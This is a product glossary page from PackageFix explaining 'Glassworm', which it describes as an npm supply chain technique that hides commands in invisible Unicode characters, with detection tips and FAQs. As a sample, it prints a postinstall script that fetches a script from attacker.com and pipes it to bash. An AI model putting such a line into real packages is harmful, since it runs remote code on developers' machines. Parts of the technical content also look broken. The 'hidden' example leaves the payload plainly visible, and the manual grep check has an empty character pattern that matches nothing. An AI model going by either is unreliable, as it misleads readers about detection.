PackageFix / Glossary / Glassworm

Glassworm

npm · supply chain · 2026
Definition

Glassworm is a supply chain attack technique where malicious code is embedded inside invisible Unicode characters — zero-width spaces, variation selectors, and other non-printing characters — within package.json scripts or source files. The code looks completely normal in text editors and code review, but the shell executes the full string including the hidden payload.

How it works

JavaScript and most terminals treat zero-width Unicode characters (like U+200B, the zero-width space) as invisible — they don't render and don't affect text appearance. But the shell sees them. An attacker can embed an entire command after an invisible character, making a benign-looking script actually execute additional malicious code.

What it looks like

What you see in your editor:

"postinstall": "node setup.js"

What's actually in the file (revealed in a hex editor):

"postinstall": "node​ setup.js && curl https://attacker.com/c2.sh | bash"

The zero-width space (U+200B) is invisible. The && and everything after it runs silently on install.

The 2026 Glassworm campaign

In March 2026, security researchers identified the Glassworm campaign — a coordinated attack using this technique against npm packages targeting developer workstations. Affected packages installed a multi-stage RAT (Remote Access Trojan) that force-installed a malicious Chrome extension to log keystrokes and steal session cookies.

The campaign was notable because standard security tools — npm audit, Dependabot, even most static analysis tools — had no detection for invisible Unicode in scripts.

How to detect Glassworm

PackageFix scans every field in your manifest for non-printable Unicode characters before running any vulnerability checks. If invisible characters are found, you get an immediate red banner: "Invisible Unicode characters detected in this manifest — do not use it." The scan stops and the manifest is flagged as potentially compromised.

You can also check manually in your terminal:

cat -A package.json | grep -P '[--]'

Check your dependencies for CVEs, CISA KEV entries, and supply chain risks.

Open PackageFix →

Free · No signup · No CLI · Runs in your browser

Common questions

Which Unicode characters does Glassworm use?
The most commonly used are: U+200B (zero-width space), U+200C (zero-width non-joiner), U+200D (zero-width joiner), U+FEFF (zero-width no-break space / BOM), and U+FE00-U+FE0F (variation selectors). All are invisible in most text editors and terminals.
Does GitHub's code review catch Glassworm?
GitHub's UI doesn't render these characters — they're invisible there too. Some GitHub security features can flag unusual characters, but code review alone is not reliable protection. Automated scanning is required.
Is Glassworm only an npm problem?
The technique applies to any ecosystem that runs scripts during install — npm's postinstall, Python's setup.py, Ruby's gemspec native extensions. npm is the most common target because postinstall scripts run automatically on npm install with no confirmation.
How is Glassworm different from obfuscated code?
Obfuscated code is visible but hard to read — it's there, just confusing. Glassworm code is literally invisible — it renders as nothing but executes as real commands. Standard code review and most static analysis tools scan what they can see, not what's hidden in invisible Unicode.

Related guides

Supply Chain Attack

The broader attack category

5 Supply Chain Attacks

Includes Glassworm detection

Zombie Package

Another hidden attack

npm Security Guide

All npm vulnerability guides